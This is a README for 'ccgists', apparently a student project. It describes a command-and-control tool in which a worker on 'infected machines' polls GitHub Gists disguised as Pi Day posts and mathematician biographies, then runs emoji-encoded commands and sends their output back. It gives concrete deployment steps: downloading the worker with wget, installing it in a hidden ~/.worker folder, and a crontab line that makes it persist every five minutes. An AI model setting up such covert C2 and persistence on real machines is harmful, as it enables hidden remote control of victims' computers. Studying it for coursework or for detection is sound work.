Table of Contents

1. About The Project
2. Getting Started
   • Installation
3. Usage
4. License
5. Contact

About The Project

This repository contains the code for the ccgists project, which is composed of two independent projects:

• controller: a Python script that allows for centralized management of the C2 infrastructure. It allows the attacker to see the list of available agents, send commands to them and read the output of the commands.
• worker: a Python script that runs periodically on the infected machine and communicates with the controller to inform about its state. In case of pending commands, it executes them and sends the output back to the controller.

The communication is done entirely through GitHub Gists. There is a gist disguised as a celebration for the Pi Day, where infected computers will post their status. When the attacker sends a command to an infected machine, it creates a gist disguised as a mathematician's biography that will be used as a thread for that communication. Commands and outputs with that machine will be encoded as emojis.

Getting Started

We will first set up the infected machines, and then the controller.

For both machines, we will use a GitHub personal access token to authenticate the requests. This token will be used to do operations with gists, which will be the only communication channel between the infected machines and the controller. A token for my account can be found in the report in Google Docs for the subject, but note that it will create private gists on my account that won't be visible from the professor's account. It's better to provide your own token, you can create one in the GitHub settings. Only the scope for managing gists is required.

Installation

Infected machines

1. Download and unzip the latest release from the releases page

wget -q https://github.com/andrsdt/ccgists/releases/latest/download/worker.tar.gz
mkdir ~/.worker; tar -xf worker.tar.gz -C ~/.worker; rm worker.tar.gz
cd .worker

2. Create a virtual environment

python3 -m venv .venv
source .venv/bin/activate

3. Install the dependencies

pip install -r requirements.txt

4. Create the .env file with the GitHub Token

echo "GITHUB_TOKEN=<secret_token>" > .env

5. Run the worker

python3 ./dist/main.py

The script can be run with python3 ./worker/dist/main.py and it will do its routine tasks when executed. It can be scheduled to run periodically (for example, every 5 minutes) with crontab by running the following bash command:

crontab -l | { cat; echo "*/5 * * * * $HOME/.worker/.venv/bin/python3 $HOME/.worker/dist/main.py"; } | crontab -

Controller

The controller's entry point is a Python script in controller/src/main.py. The setup is similar to the script for infected machines:

1. Download and unzip the latest release from the releases page

wget https://github.com/andrsdt/ccgists/releases/latest/download/controller.tar.gz
mkdir ccgists; tar -xf controller.tar.gz -C ccgists
cd ccgists

2. Create a virtual environment

python3 -m venv .venv
source .venv/bin/activate

3. Install the dependencies

pip install -r requirements.txt

4. Create the .env file with the GitHub Token

echo "GITHUB_TOKEN=<secret_token>" > .env

5. Run the controller

python3 ./src/main.py

(back to top)

Usage

The script is intuitive to use, and it will show a menu with the available options. The menu will show the available agents, and the user can select one of them to send commands to it. These will be processed as soon as the infected machine runs the script again.

For any doubt in the usage, do not hesitate to contact me

(back to top)

License

Distributed under the MIT License. See LICENSE.txt for more information.

(back to top)

Contact

Andrés Durán - @andresdt - andrez#0077 - [email protected]

Project Link: https://github.com/andrsdt/ccgists

(back to top)